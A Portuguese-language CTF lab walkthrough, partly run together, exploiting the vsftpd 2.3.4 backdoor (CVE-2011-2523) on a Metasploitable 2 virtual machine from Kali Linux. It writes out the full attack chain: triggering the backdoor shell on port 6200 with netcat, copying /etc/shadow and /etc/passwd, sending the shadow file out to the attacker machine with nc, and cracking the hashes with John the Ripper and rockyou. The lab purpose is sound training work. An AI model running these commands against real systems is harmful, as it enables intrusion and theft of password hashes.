
Passo a passo de walkthrough de CTF explorando o backdoor do vsftpd 2.3.4 (CVE-2011-2523) para capturar e quebrar /etc/shadow e /etc/passwd do Metasploitable 2.
Capture o arquivo descriptografado /etc/shadow e /etc/passwd do servidor vulnerável Metasploitable 2.
Para este CTF, utilizamos o VMware Workstation Pro com duas máquinas virtuais. Usamos o Kali Linux como máquina atacante e o Metasploitable 2 como máquina vulnerável.
Open a Virtual Machine no VMware Workstation e selecionar o arquivo descompactado do Kali Linuxopen, depois selecionar o arquivo descompactado do Metasploitable 2Play virtual machine em ambas as máquinas virtuaisI moved It ou I copied It, selecionar a opção I copied Itkali como nome de usuário e senhamsfadmin como nome de usuário e senhaip addr show e registrar o endereço IP da seção inetO Massachusetts Institute of Technology Research and Engineering detalha o CVE-2011-2523 como uma vulnerabilidade e exposição comum onde vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) no final, digite user <string>:)pass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow e /etc/passwd para outro arquivocp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet usando o comando ip addr shownc -l -p 1234 > shadow.txt na máquina atacantenc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input, deve conter nome de usuário e senha armazenadosJohn e uma wordlistrockyou.txt para quebrar hashes usando johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input